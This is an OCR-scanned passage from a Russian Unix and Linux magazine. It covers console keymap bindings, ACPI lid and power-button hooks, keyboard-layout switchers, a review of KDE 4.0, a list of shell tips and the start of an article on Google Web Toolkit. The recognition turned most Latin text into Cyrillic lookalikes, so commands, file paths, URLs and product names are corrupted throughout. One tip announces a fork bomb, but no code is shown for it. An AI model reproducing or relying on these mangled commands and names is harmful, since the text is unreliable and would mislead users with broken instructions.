Здесь простор для творчества даже больше, чем в иксах. В кеутарз(5) про- 
цедура установки соответствия кеусобе выглядит следующим образом: 

{ ріаіп | <шосіі1іег зедиепсе> } кеусосіе кеупитЬег = 
кеузут 

Пример: 

# Переключение консоли на одну назад при нажатии на кла- 
вишу с кодом 105 

кеусосіе 105 = Бесг_Сопзо1е 

# Переключение консоли на одну вперед при нажатии на 
<АІС> и клавишу с кодом 106 

аІС кеусосіе 10 6 = Іпсг_Сопзо1е 

Но можно создавать и свои варианты, указывая команду в переменных: 
кеусосіе 120 = Р100 

зкгіпд Р100 = " /зЪіп/зІшСсІоѵлі -Ъ. поѵЛп" 

Другими словами, по нажатии клавиши с кодом 120 будет выполнено дейст- 
вие, указанное в переменной РІ 00; в нашем случаезадано выключение ком- 
пьютера. Вместо Е100, естественно, можно использоватьлюбое другое имя. 
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Интерфейс настройки ХЫеиг 

Теперь не менее важная часть — куда все это записывать. В документации и в 
многочисленных советах предлагается использовать текущий файл консоль- 
ной раскладки (в моем случае — ЬооШте.ктар.дг). Кстати, это единствен- 
ный файл описания раскладок, доступный послеустановки КІІЬипіи; чтобы 
увидеть остальные варианты, еле дует у стан овить пакетсопвоіе-сіаіа. После 
этого в/изг/зИаге/кеугпарз/іЗВб/ можно обнаружить несколько подкаталогов 
сфайлами внутри. Но еслитебе понадобится перейти на другую раскладку 
(в ІІЬііпШ и некоторыхдругихдистрибутивахдля этих целей используется 
файл /еБ/беІаиЙ/сопБОІе-БеШр или -/.сопзоіе-зеіир), все настройки нужно 
будет перенести в другой файл, что несколько неудобно. Бел и ты все-таки 
решишься на этотшаг, используй имеющиеся записи какшаблон, ничего не 
записывая на первую позицию, а в конце не забудь оставить пустую строку. 

Б НЕМНОГО О НОУТБУКЕ 

Пока мне не попадался ноутбук, скан-коды клавиш которого определить не уда- 
лось бы. Поэтому настройки здесь ничем не отличаются отописанных выше. Хотя 
есть один прием, о котором хотелось бы рассказать. Я считаю оченьудобным в 
использовании режим гибернации, когда, включив компьютер, обнаруживаешь 
все на своих местах. Современные дистрибутивы, как правило, его поддержи- 
вают, хотя настройка, в общем-то, несложна — достаточно установить па кет 
ЫЬегпаіе и переопределить необходимые параметры в конфигурационном 
файле. Единственное, каждый раз для перехода в этот режим нужно за пускать 
скрипт/изг/зЬіп/ЫЬегпаІе, что не всегда удобно. Хочется просто закрыть крышку 
ноутбука, а вновь включив питание, обнаружить все на своих местах. 

Это очень просто сделать, используя демон аеріеі, который представляет 
собой нечто вроде пользовательского интерфейса, позволяющего управ- 
лять любыми событиями АСРІ, доступными через/ргос/асрі/еѵепЕ При этом 
аеріеі читает набор конфигурационных файлов из каталога /еіе/аері/еѵепіз/. 
Если пакете демоном в дистрибутиве отсутствует, устанавливаем его из ре- 
позитария; последнюю версию можно взять с сайта рИоЬозіз.іит.сІе/асрі . 
Послеустановки необходимо в каталоге /еі с/а с рі/еѵепІБ создать два файла: 
ІісІ и роѵѵег. Первый описывает реакцию на закрытие крышки, второй — на 
нажатие кнопки включения питания. 

$51Ю0 МСЕйІТ /ЕТС/АСРІ/ЕѴЕІЧТБ/иО 

еѵепЦ=ЬиО Доп /ІісІ. * 

асДіоп= /изг / зЬіп/МЬегпаІіе 

$51Ш0 МСЕйІТ /ЕТС/АСРІ/ЕѴЕМТ5/Р0ѴѴЕР 

еѵепД=ЪиЦЦоп/ротѵег . * 

асДіоп=/зЪіп/зЬиОс1оѵт -Ь. поѵі 

Это несколько упрощенные варианты, в КІДэипІиты найдешьболее слож- 
ные скрипты. После этого требуется перезапускдемона аеріеі: 

$ зисіо /еДс/іпіО . сі/асрісі гезДагО 



Теперь при закрытии крышки ноутбука система будет впадать в спячку с 
выключенным питанием, а при нажатии на кнопку питания — выключаться. 
Просто и удобно. 

В ПРОГРАММЫ НАСТРОЙКИ 

Еслитебе не по душе возня с конфигурационными файлами, предлагаю 
несколько программ, которые помогут настроить работу мультимедийных 
клавиш. Например, первоначальное назначение программы Зѵеп (зѵеп. 
Ііпих.кіеѵ.иа) — настройка дополнительных клавиш на мультимедийной 
клавиатуре, но, начиная с версии 0.4, она умеет исправлять ошибки при 
наборе текста и изменять клавиатурную раскладку. Болеетого, даже если 
утебя обычная клава, с ее помощьюты сможешь эмулировать мультиме- 
диа-клавиши, использовав вместо них клавиатурные сочетания. Также 
можно назначитьдействия на определенные кнопки мыши. Она понимает 
приблизительно 10 000 русских слов и 9 500 английских. Если программа 
не переключилась сама, то раскладку можно изменить и вручную, при по- 
мощи специально заданной клавиши (поумолчанию <Вгеак>). Отдельной 
клавишей (<5сгоІІ Боск>) можно изменять регистр слов (верхний, нижний, 
первая буква — верхний, остальные — нижний). Индикатор-переключатель 
раскладки клавиатуры запоминаетсвое состояние для каждого окна, по- 
этому, часто переключаясь между приложениями, тебе уже не нужно будет 
дополнительно изменять и раскладку. Программа имеет большие возмож- 
ности, и я бы советовал на нее взглянуть. Все настройки производятся при 
помощи графической программы, построенной на библиотеках 6ТК+. Зѵеп 
тестировался в Бі п их, но в принципе должен работать и на *В50-системах. 
Используемый оконный менеджер не имеетзначения. 

Возможности КеуТоисЬ [ кеѵІоисЬ.БЕпеі ] несколько скромнее, эта утилита 
применяется исключительно для настройки мультимедийных клавиш. 
Хотя с ее помощью любой клавише можно назначить свое действие, 
отличающееся от уста но вок по умолчанию. На сайте программы, кроме 
исходныхтекстов и пакетов для некоторых дистрибутивов, можно найти 
готовые настройки для мультимедийных клавиатур большинства извест- 
ных производителей. 

Еще одно интересное решение — хбіпсікеуз [ Ьосѵѵрігееіг/хЫпсІкеуБ/ 
хЬіпсІкеѵБ.ЫтІ ) — позволяет присваивать любой кнопке клавиатуры и 
мышки любые команды, в том числе и команды оболочки. Все настройки 
производятся в конфигурационном файле, который имеет простой и понят- 
ный формат. ц-ц 



Хпеиг — аналог 
РиШо ЗшйсЬег 

Достаточно распространено мнение, что программ, автоматически 
переключающих раскладку клавиатуры, как это делает Рипіо Здѵпсііег 
и ей подобные, в Ілпих нет. Хочу бросить камень в огород саботажни- 
ков. О Зѵеп, который обладает подобной функциональностью, можно 
прочитать в этой статье, но есть еще иХ Кеигаі Зѵѵіісііег — Х№иг 
С ѵѵщу.хпеиг.ги) . Эта программа анализирует вводимые пользовате- 
лем символы и, если их последовательность не характерна для теку- 
щего языка, переключает раскладку и переписывает последнее слово. 
Функционально Хпеиг разделен на две части. Демон хпеиг считывает 
конфигурационные файлы, работает в фоне и реализует все возмож- 
ности программы. Для удобной настройки используется графический 
интерфейс, точнее, два: §хпеиг написан с использованием библиотек 
СТК+, акХ№иг — интерфейс для ЮЖ Кроме исходныхтекстов на 
сайте доступны пакеты для ЭеЬіап, ІіЬипт, АЗР Ілпих, СепЮЗ/КНЕЬ, 
Ребога 7 и 8 . Есть Хпеиг и в репозитарии АКТ Ілпих. 
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КРЕ 4.0: ОБЗОР НОВОВВЕДЕНИИ И ВОЗМОЖНОСТЕЙ 



В Европе самой популярной рабочей средой для *піх-систем был и остается ЮЭЕ. Его 
любят за простоту использования, легкость освоения, насыщенность приложениями 
практически для всех повседневных задач, критикуют за наличие большого количества 
параметров для настройки, многофункциональность приложений, предъявляющих по- 
вышенные требования к системным ресурсам. Год назад мы пили пиво, празднуя десяти- 
летие проекта, сегодня отмечаем уже четвертый релиз КБЕ. Пора с ним познакомиться, 
тем более что версия 4.0 была в репозитариях большинства дистрибутивов еще с альфы. 



Н НЕМНОГО 0 ПРОЕКТЕ 

Датой рождения проекта принято считать 14 октября 1 996 года. Именно в 
этот день в Ѳоодіе дгоирв появилось сообщение студента Тюбингенского 
университета Маттиаса Эттриха о предложении начать разработку нового 
АРІ для Кооі Резкіор Епѵігоптепі (КРЕ) с использованием библиотеке^. 



Обилие программ, практически не отличающихся функционально, но зато 
сильно отличающихся внешне и поведенчески, только отпугивало поль- 
зователей от*піх-систем в целом и от Ыпих в частности. Поэтому основной 
идеей нового проекта было созданиетакой среды, в которой все прило- 
жения выглядели бы и вели себя одинаково. Пользователь не должен был 
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Добавление виджетов 



видеть отличия в поведении программ. Предполагалось, что новая среда 
будет интуитивно понятна и проста в эксплуатации. 

И, кстати, по прошествии некоторого времени можно смело заявить, что реализо- 
вать задуманное разработчикам удалось. Да, многим не нравится, чтоКопциегог 
— это уже не столько файловый менеджер, сколько «комбайн», понимающий 
многие форматы, и хотя он явнотяжелее гномьего Наутилуса, зато пользователь 
не задумывается: что, каки где. Многиеэксперименты показывают, что человек, 
до этого работавший в ѴѴІпбоѵѵз, осваивается в КИЕ без особых проблем. 
Несмотря на споры по поводу необходимости в еще одном проекте, 
инициатива была поддержана, и на встрече разработчиков в августе 
1 997 года КБЕ-ОЫЕ в Арнсберге (Германия) присутствовало уже 1 5 
участников. К этому времени среда насчитывала достаточное количес- 
тво приложений. В октябре этого же года была выпущена Веіа 1 , а через 
месяц — Веіа 2. Первая версия КИЕ 1 .0 увидела свет в июле 1 998 года. 

С самого начала в качестве инструмента для разработки пользователь- 
ского интерфейса были выбраны библиотеки СК. Но на тот момент 01 не 
использовал свободную лицензию, поэтому постоянно возникали споры 
отом, что свободная среда и входящие в ее состав программы не могут 
создаваться с применением закрытых инструментов. Причем на стороне 
критиков выступал и ЛинусТорвальдс. Все это сильно мешало команде 
разработчиков и отнюдь не способствовало популярности КОЕ. Кстати, это 
также послужило причиной появления еще двух проектов под эгидой 6 N11: 
бпоте и Нагтопу. Какты знаешь, в первом вообще отказались от 01, а за- 
дача Нагтопузаключалась в создании библиотек, совместимых по АРІ с 01, 
но под свободной лицензией. Вапреле 1997 года между Тго Шее И, которая 
имела все права на 01, и КОЕ было подписано соглашение по вопросам 
лицензирования, отраженное в документе«КБЕ Егее 01 Еоипбаііоп». В 
ноябре 1998 года инструментарий 01 стал использовать свободную лицен- 
зию — Ореп Зоигсе 0 РиЫіс Ысепзе (ОРИ, а в сентябре 2000 года ТгоШесН 
выпустила *піх-версию библиотекой подлицензией 6ЫБ 6РБ. Стого 
времени все споры постепенно утихли, а продолжение работнад Нагтопу 
потеряло смысл. 

Разработчики такое событие отметили выходом версии КОЕ 2.0 (октябрь 
2000 года), хотя триумфальное шествие этой среды на десктопы началось 
с версии 2.1 (февраль2001 года), в которой былиучтены многочисленные 
пожелания пользователей. 

Со временем КОЕ действительно стал рабочей средой, сочетающей удобс- 
тво и простоту использования, где интегрированы десятки приложений 
буквально на все случаижизни: ПО для работы с мультимедиа, графикой 
и интернетом, пакет офисных приложений, образовательные программы, 
игры и многое другое. Интерфейс был переведен на десятки языков мира, 
среди которых есть и русский. 



Начиная с версии 4.0, библиотеки 01 доступны каксвободное ПО нетолько 
для *піх-, но и для Мае-, ѴѴІпбоѵѵз- и встроенных систем. Библиотеки, при- 
ложения и рабочая среда КОЕ больше не привязаны кодной платформе. 
Конечно, большинство приложений КѴѴІп, КБМ и многие другиетребуют 
Х-ѴѴІпбоѵѵ, нос портированием в Винду Копциегог и Атагок проблем 
стало меньше. Поэтому, кто знает, может, через некоторое время мы будем 
работать в Ѵізіа, слушая музыку в Атагок вместо ѴѴІп б оѵѵз Мебіа Ріауег, а в 
интернет выходить, используя завоевателя вместо исследователя :). 

В настоящее время проект поддерживается многочисленными доброволь- 
цами по всему миру. Крометого, привлекаютсвоих программистов для 
участия в проекте или помогаютфинансовотакие компании, как Мапбгіѵа, 
ЫоѵеІІ.ТгоШесН, БеИ, ІВМ. Основатель Сапопісаі І_1б. и создатель Ыпих- 
дистрибутива ІІЬипІи Марк Шаттлвортстал одним из первых покровителей 
КОЕ, оказавших проекту весомую спонсорскую помощь. 

г СОВМЕСТИМОСТЬ ВЕРСИЙ 

Мажорные релизы 1 .х, 2.x ит.д. между собой, как правило, несовместимы по 
АРІ, однако приложение внутри релиза (например, для 3.0) с большой долей 
вероятности будет работать и с более новой версией (до 3.5.x). Отличия в 
АРІ между второй и третьей версиями были незначительны, и приложения 
легко переписывались под новый релиз. Программы, сделанные для 01 3, 
не будут работать в четвертой версии, компиляция закончится неудачей. 
Поэтому при переносе кода придется немного потрудиться. Информация 
по портированию сорцов с 01 3 на четвертую версию библиотек приведена 
в документе «Рогііпд Іо 01 4» [ бос.1гоЦіесЬ.сот/4.1/рог1іпд4.Ніт1- ). В нем 
ты найдешь отличный обзор главных изменений в ОЫ вместе со списком 
изменений в классах и функциях. 

Изначально нумерация версий КБ Е привязывалась к номеру библиотек ОБ 
Послетого как стали доступны 01: 4.x, разработчикам ничего не оставалось, 
какзаняться переносом среды под новую версию. Выясним, что нового 
появилось в этой среде. 

Н НОВЫЕ БИБЛИОТЕКИ И ОСОБЕННОСТИ СБОРКИ 

В качестве основы для КйЕ4.0 взяты библиотеки 014.3. Основные воз- 
можности, которые они предоставляют, перечислены на странице бос. 
1гоЦіесЬ.сот/4.3/ді4-3-іп1го.Ьіт[ . В первую очередь хочется отметить 
улучшение системы, отвечающей за вывод графики. Движок, поддержива- 
ющий ОрепѲБ (и ОігесіЗО для ѴѴІпбоѵѵз-версии), позволяет использовать 
все преимущества современных графических карт. А переложив ответс- 
твенность за вывод графики с использованием возможностей ОрепбБ на 
ту часть видеокарты, которая отвечает за ЗБ, можно ускорить прорисовку 
двухмерных элементов рабочего стола, открывтем самым безграничные 
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возможности по его обустройству. Новый движок вовсю юзаетсглажива- 
ние, регулируя возможности апб-аііазіпд. Можно даже выбирать между 
качеством и производительностью. С введением класса ОзѵдѲепегаІог 
появиласьулучшенная поддержка формата 5ѴѲ (ЭсаІаЫе ѴеФогѲгарЬісз). 
Результат рендеринга, производимый программами с интерфейсом СИ, 
может быть сохранен в этом формате. Класс Озѵдбепегаіог используется 
вместе с имеющимися ОЗѵдѴѴІбдеІ и ОзѵдРепбегег, обеспечивая полную 
поддержку векторной графики. 

Основные классы, выводящие окно программы, поддерживают многие 
функции, доступные в ѴізиаІЗіибіо или КОеѵеІор. Например, доковые 
виджеты, благодаря новому АРІ СЮоскѴѴІсІдеС теперь можно пристегнуть 
в любое удобное место. А значит, внешний вид можно будет изменять 
кактебе вздумается — ограничений минимум. Ктомуже значительно 
расширена поддержка различных эффектов анимации. Новый класс 
ОѴѴІпбоѵѵзѴізІаЗіуІе обеспечивает приложениям СИ внешний вид и поведе- 
ние, присущее приложениям в ѴѴІпбоѵѵзѴізІа. Для создания разного рода 
мастеров, позволяющих пользователю настроить те или иные параметры, 
следует использовать класс ОѴѴІгагб. Доступны четыре стиля оформления 
мастера: СІаззісЗіуІе, МобегпЗіуІе, МасЭіуІе и АегоЭіуІе (только в Ѵізіа) . 
Введен модуль СИЗспрС обеспечивающий поддержку языка ЕСМА5спр[, 
основанного на стандарте ЕСМА-262 (его спецификацию можно посмотреть 
на прилагаемом кжурналудиске). Этотязык широко используется в вебе. 
Например, известные ИаѵаЗсгірІ, ИЭсгірІ и АсЬопЗсгірІ являются как раз 
расширениями ЕСМА-262, который призван устранить проблемы с совмес- 
тимостью. Ведьсегодня написатьуниверсальный скрипт, совместимый с 
любым браузером, довольнотрудно. 

Но самым значительным изменением, произошедшим в ОС является 
модульность. Другими словами, стало можно написать приложение для 
терминала, не связываясь с более высокими классами, отвечающими за 
графические элементы. Это разделение внутренних классовтакже пере- 
шло в полностью переработанные кбеІІЬз, поэтому многие операциитеперь 
возможно производить в командной строке. 

Имена значков в К0Е4 и соответствующих компонентов кбеІіЬз основаны 
на спецификации, предложенной Ітеесіезкіюр.огд (также смотри на диске). 
Портировать имена значков из проекта КйЕЗ на принятые в КйЕ4 можно 
при помощи специального скрипта абарМо-ісоп-зрес.ру. Вместо ОСОР, 
используемого в КРЕЗ, в КйЕ4для взаимодействия программ друге другом 



используется 0-Виз. Тема перехода ОСОР -> 0-Виз горячо обсуждается на 
многочисленных форумах. 

Со времени основания проекта КОЕ для сборки использовался аиіоіооіз. 
Такая система была сложна для новичков и требовала некоторого времени 
на освоение. Теперьэто в прошлом, в КОЕ4.0 вместо аиМооІз применяется 
СМаке ( ѵѵѵѵѵѵ.стаке.огд ). который на порядок проще в использовании. К 
томуже СМаке может генерировать Ьиііб-файлы, понятные компиляторам 
*піх, КОеѵеІор и коммерческим решениям вроде М5 ѴізиаІС++, что снимает 
проблему мобильности. 

В ПОДСИСТЕМЫ МУЛЬТИМЕДИА И КОММУНИКАЦИИ 

Начиная с КОЕ 2.0, в качестве мультимедийной архитектуры использовался 
а Ріа (а па Іод РеаШте зупібезігег — аналоговый синтезатор реального 
времени. ѵѵѵѵѵѵ.агІіз-ргоіесТогд ). Для того времени это был действительно 
прорыв, так кака Різ позволял воспроизводить одновременно несколько 
аудиопотоков, как на локальном компьютере, таки посети. Но постепенно 
а Ріа, ориентированный только на работу с аудио, перестал удовлетворять 
всем требованиям. Кроме того, главный разработчик аРіа, Стефан Вестер- 
фельд, перешел в КйЕ и начал работу в другом направлении. 

В последних релизах КОЕ 3.x для работы с мультимедиа уже использова- 
лись сторонние библиотеки: ІІЬхіпе, Ѳаітеатег, тріауег. Причем различ- 
ные приложения из состава КйЕ могли задействовать разные варианты, 
что создавало проблемы. Эти и многие другие вопросы привел и к тому, 
что в КОЕ 4.0 решили перейти на совершенно новый АРІ для работы с 
мультимедиа, получивший название РЬоІоп ( рЬопоп.ксІе.огд І. Функци- 
онально РЬоІоп — это еще один слой, находящийся выше библиотек 
нижнего уровня ІІЬхіпе и бзігеатег. Это обеспечивает доступ к видео и 
аудио любому приложению без проблем совместимости и возможного 
изменения в мультимедиа-библиотеках КйЕ. Новый слой позволяет 
упростить перенос КйЕ на другие системы, разработчикам не нужно 
учитывать особенности всех систем. Чтобы проиграть файл, требуется 
всего 4 строки кода для РЬоІоп и 30 при использовании аРіа. Приложе- 
нию достаточно указать на необходимость получения информации, а все 
остальное — это уже забота Фотона. Что будет использовано в качестве 
выходного буфера — Хіпе, Оиіскііте или ОігеФХ, теперьуже не имеет 
значения. Для настольной системы с ее всевозможными конфигурация- 
ми это то, что доктор прописал. 
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Чтобы упроститьжизнь пользователя, Фотон обещают научить автоматиче- 
ски переключать устройства. Например, при подключении гарнитуры для 
работы с ѴоІР, при поступлении звонка, звуковая карта будет переключать- 
ся на выводзвука разговора через новое устройство, а музыка по-прежнему 
будет играть в колонках. ТгоШюсЬ собирается добавить РЬоФп в следующую 
версию библиотек 01: 4.4. 

Новым фреймворком, отвечающим за коммуникацию, является РесіЬеІ 
І сІесіЬеІ.ксІе.огд ). задача которого — интеграция в десктоп всех современ- 
ных протоколов связи. Клиентская база всех протоколов (ІСО, Зкуре, НаЬЬег, 
етаіі, ѴоІР и другие) собирается в одном месте, пользователь лишь должен 
выбрать нужный контакт, а какустановить с ним связь — это уже забота Де- 
цибела. Правда, на полную катушку этот проект обещаютзапустить только к 
версии 4.1 . 

ЕЗ РАБОЧЕЕ ОКРУЖЕНИЕ ПОЛЬЗОВАТЕЛЯ 

Все, о чем говорилось ранее, скрыто под капотом. Теперь отом, что снару- 
жи. Ведь новичка принято встречать по одежке. 

Новой рабочей средой для КОЕ4.0 является Ріавта [ \ллл/ѵѵ. ріазппа .ксіе.огд і. 
объединившая в единое приложение рабочий стол, панель КОЕ и виджеты 
ЗирегКагатЬа (втом числе и написанные для версии 3.x). Крометого, рабо- 
тают виджеты Ар ріе РазЬЬоапсІ, и в будущем планируется поддержка плаги- 
нов браузера Орега. Для разработчиков доступно единое АРІ, позволяющее 
создавать плазмоиды — небольшие приложения или виджеты для новой 
среды, которые с легкостью интегрируются с рабочим столом или панелью. 
Работа сданными в Ріазппа и их визуализация разделены, что открывает 
простор для творчества и упрощает программирование. Фреймворком для 
плазмоидов да и для среды КОЕ4.0 в целом служит Кпозз. Последний не 
является еще одним языком, его задача гораздо прозаичнее — упростить 
создание новых приложений для этой среды. Теперь можно писать виджеты 
на С++, РуіЬоп, РиЬу, ^ѵаЗспірІ и Еаісоп. При необходимости модульность 
Кгозз позволяет добавить поддержку любого другого языка. Кроме Ріазппа 
Кгозз в настоящее время поддерживает и другие приложения: КѴѴогб, 
КЗрпеасІ, Кгііа, Кехі ЗирегКагатЬа. Думается, этот список будет постепенно 
расширяться. 

Но разработчики считают, что одной Плазмы маловато, чтобы удивить юзе- 
ра. Долой старые значки, напоминающие карикатуру, теперь рулитболее 
реалистичная векторная графика, предоставляемая новой темой оформле- 
ния Охудеп ( охѵдеп-ісопз.огд ). которая использована поумолчанию в КйЕ 
4.0. Основные приложения уже используютновыезначки. Все, куда не кинь 
взгляд, теперь выглядит по-новому: меню, курсоры, новая графика в при- 



ложениях. Разработки Охудеп поддерживают стандарты и спецификации 
ЗіапсІапсІ Ісоп Ыатіпд Зресібсабоп и ЗіапсІагсІ Ісоп ТЬете от ігеесіезкіор. 
огд . единство стиля позволяет использовать наработки в различных прило- 
жениях. Виджеты и другие элементы украшения поддерживают изменение 
внешнего вида при помощи 055-подобных файловтем. 

Обновленный оконный менеджер КОЕ — КѴѴІп — имеет некоторые эффекты 
ОрепОЬ, которые ранее были доступны в композитных оконных менеджерах 
вроде Сотріг ( сотріг.огд ). Кстати, если видеоподсистема не может воспро- 
извести тот или иной эффект, он просто отключается. 

Н ФАЙЛОВЫЙ МЕНЕДЖЕР БОІ.РНІЫ 

Новое окружение пользователя потребовало и новых приложений. Так, 
Копдиегог, заменивший на посту файловый менеджер КЕМ, начиная с 
КОЕ 2.x, уже вобрал в себя столько функций, что было решено вернуться 
к предыдущей схеме. То есть файловый менеджер должен быть только 
файловым менеджером. Теперь в этом качестве юзеру предлагается 
ОоІрЬіп (еп205\л/огІсІ.дтхЬоте.сІе), в котором просмотр рисунков, препро- 
слушивание музыки и некоторая другая привычная функциональность уже 
недоступны. Для этих задач вызываются сторонние приложения. Пока нет 
многооконности, хотя поддержка КІО Зіаѵез присутствует. 

Система навигации в ОоІрЬіп несколько напоминает принятую в ѴѴІпсІоѵѵз 
Ѵізіа. Окно визуально разбито натри части. В левой отображены закладки, 
посередине — сами файлы и каталоги, а справа выводится информация по 
выбранному файлу. Здесь же находятся пункты, предлагающие действия, 
которые можно произвести сданным объектом, не прибегая к меню (зашиф- 
ровать, заархивировать, отправить по почте, открыть как пооі и другие). При 
необходимости среднее окно можно разделить на две независимые части, 
что оченьудобно при копировании файлов из одного каталога в другой. По 
умолчанию адресная строка не выводится, открыть ее можно, нажав на не- 
приметную кнопку ЕсІІІ Босабоп. Закладки в левую панель можно добавлять 
простым перетаскиванием. 

Благодаря набору технологий N ЕРОМ II К (ЫеіѵѵогкесІ Епѵігоптепі Іоп 
Репзопаіігесі, Опіоіоду-Ьазесі Мападетепі оі ІІпібесІ Кпоѵѵіебде, перотик. 
зетапбссіезкіор.опд ) ОоІрЬіп получил так называемые семантические 
свойства, позволяющие связывать воедино различные предметы итипы 
данных в десктопе и вне его, осуществлять поиск, обмен информацией и 
прочее. Пока эта технология находится в самом начале пути, самое инте- 
ресное обещают в будущем. 

И в заключение хочется отметить, что с Копдиегог ничего криминального не 
случилось, он также доступен пользователям КРЕ4.0. ТГ 
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АНДРЕЙ МАТВЕЕВ 

/ АЫОП1І8НОСК@ПЕАІ..ХАКЕР.ІШ / 

ТІР8’№ТКІСК8 



юниксоида трюки и советы юниксоиду 



Доблестный юниксоид! Представляю твоему вниманию очередную подборку различных 
трюков, рекомендаций и советов, касающихся *піх-систем. 




Подсчет количества строк в текстовом файле с 
помощью утилиты зеб: 



$ зесі -пе ' $= ' ~/.ѵітгс 



2 



В 25Іі воттак можно просмотреть содержимое 
файла, не прибегая кутилитам вроде тоге и Іезз: 

$ < ~/ . ѵітіпТо 



3 



При большой многовложенности каталогов, 
возможно, стоит отказаться от использования 
команды сб : 

$ ѴІ ~/ . 2 3ІТГС 

зеТорТ аиТосй 
аііаз -д 

аііаз -д . . . . = ' ' * 

$ . ~/ . 23ЬГС 



Теперь, чтобы вернуться на три директории 
вверх, достаточно набрать 




Сокращенный вывод при подсчете размера те- 
кущего каталога (исключаем перечисление всех 
файлов, оставляем только подкаталоги): 



$ <іи -Ь . | дгер -ѵ '/.*/' I зогТ -п| 



5 



Одна из самых маленьких реализаций 
форк-бомбы: 



6 



В состав практически любой *піх-системы входит 
мощный калькулятор, который может использо- 
ваться в интерактивном режиме или обрабаты- 
вать сценарии, написанные на языке, похожем 



на С. Для примера превратим его в конвертор 
валют: 




% есЬо "зса1е=2; 1000/24.92" | Ьс 
40.12 



8 



Также с помощью Ьсудобно выполнять перевод 
между различными системами исчисления. На- 
пример, переведем 20 из бес в Ьех и обратно: 



9 



$ есЬо 1 


"Ьазе=16 ; 2 0 " I 


Ьс 


14 

$ есЬо 


" іЬазе=16 ; 20" 


1 Ьс 



32 



ІО 



Показать календарь на текущий месяц: 

$ саі 12 2007 



11 



Просматриваем разницу междудвумя версиями 
файла со скроллингом и в цвете: 

(~/йеѵе1/ѵ\плплй % сѵз -Тд -й апйгеу@сѵз . 
орепЬзй. ги : /сѵз ЙІТТ -и -р -гі.23 - 
гі.24 йосв/ЬомТо-Ьгійде . ЬТтІ I ѵіш - 



12 



Запретобращения кбоиЫесІіск.сот с помощью 
демона патеб (этот способ позволяетускорить 
загрузку некоторых ѵѵеЬ-страниц): 

# ѵі /ѵаг/патей/сопТ/патей. сопТ : 
гопе " йоиЫесІіск . сот" { 

Суре тазТег; 

іііе "тазСег/йоиЫесІіск . сот" ; 

} ; 

# ѵі /ѵаг/патей/тазіег/сіоиЫесІіск. 
сот: 

[ [ здесь идет стандартная БОА- запись 
] ] 



ай. йоиЫесІіск. сот. Ш А 



|127 . 0.0.1 






* . йоиЫесІіск . сот. 


Ш 


А 



127.0.0.1 
# гпйс геіоай 



13 



Чтобы в ОрепВЗО выполнить полный и быстрый 
бэкап файловой системы /ѵаг на раздел б второго 
диска, следует ввести следующую комбинацию 
команд: 

# пеміз ѵ^йій 

# ткйіг /тпк/ѵаг 

# тоипк -о азупс /йеѵ/ѵ^йій /тпк/ѵагН 

# йитр ОТ — /ѵаг | (ей /тпк/ѵаг; 
гезкоге гі - ) 



14 



Если нужно скопироватьтолько часть файловой 
системы (в данном случае катал ог/ѵаг/патеб), 
можно воспользоваться командой іаг: 

# ей /ѵаг 

# Таг сі — пашей I (ей /тпТ/ѵаг; Таг 0| 
хрТ -) 



15 



Используем псевдографику для отображения 
аптайма: 

% ирТіше I аѵік ’ { вдЫ1е($3--) а=а ,, = м ; 
ргіпТ "1" а " >" } 1 

I = = = = = = = = = = = = = = = = === = = “|| 



іб 



Для того чтобы определить, к какому установ- 
ленному пакету относится файл іюоЬаг, набираем 
одну из следующих команд: 

Тейога$ грш -дТ ТооЬаг 
депТоо$ едиегу Ьеіопдз ТооЬаг 
йеЬіап$ йркд -8 ТооЬаг 
ТгееЬзй$ ркд_іпТо -VI ТооЬаг 
орепЬзй$ ркд_іпТо -Е ТооЬаг НС 
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то, что 

60061-Е 

ПРОПИСАЛ 



СОЗДАНИЕ АМХ-П РИЛ ОЖЕНИИ 



С ИСПОЛЬЗОВАНИЕМ 6ѴѴТ 



С переходом технологии АТАХ от стадии «новомод- 
ной штуки» к статусу рабочей лошадки веб-про- 
граммирования стали активно развиваться 
инструментальные средства, призванные повы- 
сить эффективность разработки АТАХ-приложе- 
ний. В частности, это придало импульс прояв- 
лению разнообразных фреймворков, основное 
назначение которых — освободить программиста 
от необходимости рутинного написания однотип- 
ного, многократно повторяющегося программного 
кода, сосредоточившись на логике веб-приложе- 
ния. Один из них — Соо§1е ѴѴеЪ Тооікй. 



а СОО^ІС 



НИКОЛАЙ Б АЙБОРОДИН 

/ ВАІВОКООІЫ@СМА1І_.СОМ 



В ПАТРОН В ОБОЙМЕ 6006ЬЕ 

В этой статье мы расскажем об одной технологии, созданной парнями из 
компании Сереги Брина и Лари Пейджа. Опыт показывает, что все, что 
делаетбоодіе, какминимум достойно пристального внимания. Однако... 
Все более или менее раскрученные проекты от ІТ-компании номер один 
предназначены для конечного пользователя. Что же получается, Ѳоодіе 
незаслуженно обходитсвоим вниманием программистов? Отнюдь. И под- 
тверждениетому — фреймворкбоодіе ѴѴеЬТооІкі* (ѲѴѴТ). 

ПроектѲѴѴТ перешел в публичную стадию в мае 2006 года.Учитываятемпы 
развития ІТ-индустрии и более чем полуторалетний возрасттехнологии, 
можно констатировать некий показательзрелости, обязывающий ко мно- 
гому. Итак. Ѳоодіе ѴѴеЬТооІкіІ (ѲѴѴТ) представляет собой инструментарий 
разработки клиентских веб-приложений с использованиемтехнологии 
А^АX. Нуда, конечно, ты можешь сказать, что АОАХ-фреймворков сейчас 
развелось, какдепутатов после выборов. Правильно. Только неторописьде- 
лать поспешные выводы — лучше разберемся с основными фишками ѲѴѴТ. 
Главное отличие ѲѴѴТ от прочих фреймворков состоит в том, что программ- 
ный код, реализующий пользовательский интерфейс в окне веб-браузера, 



пишется не на НаѵаѲсгі рГ, а на .^ѵа. Аты какдумал! Если за дело берется 
Ѳоодіе, проект обязательно будете изюминкой. А в случае с ѲѴѴТ это целый 
килограмм изюма! 

Зачем понадобилось использовать ^ѵа для создания ^ѵаЗсгірІ-интер- 
фейсов? Амного литы знаешь действительно серьезных инструментов раз- 
работки, заточенных под ^ѵаЗсгірІ? То-то и оно... Совсем другая ситуация с 
^ѵа, для которой созданы ПАБ-системы с функциональностью авианосца. 
Ѳоодіе ѴѴеЬТооІкіІ позволяет использовать всю эту мощьдля создания 
клиентских А^Х-приложен ий. 

Я тебе обещал горы изюма?Тогда подставляй свои шаловливые ладошки. 
ѲѴѴТ — это не только транслятор ^ѵа-кода в БаѵаБсгі рі:, это еще и набор 
убойных библиотек, реализующих возможности самых разнообразных 
виджетов, оконных форм, элементов графического оформления. Вижу, твои 
глаза загорелись, не иначеты вспомнил об интерфейсах Ѳоодіе Саіепбаг, 
Ѳоодіе ЗргеаЬЗЬкз и Ѳтаіі. Да, именнотак— все это богатство псевдо- 
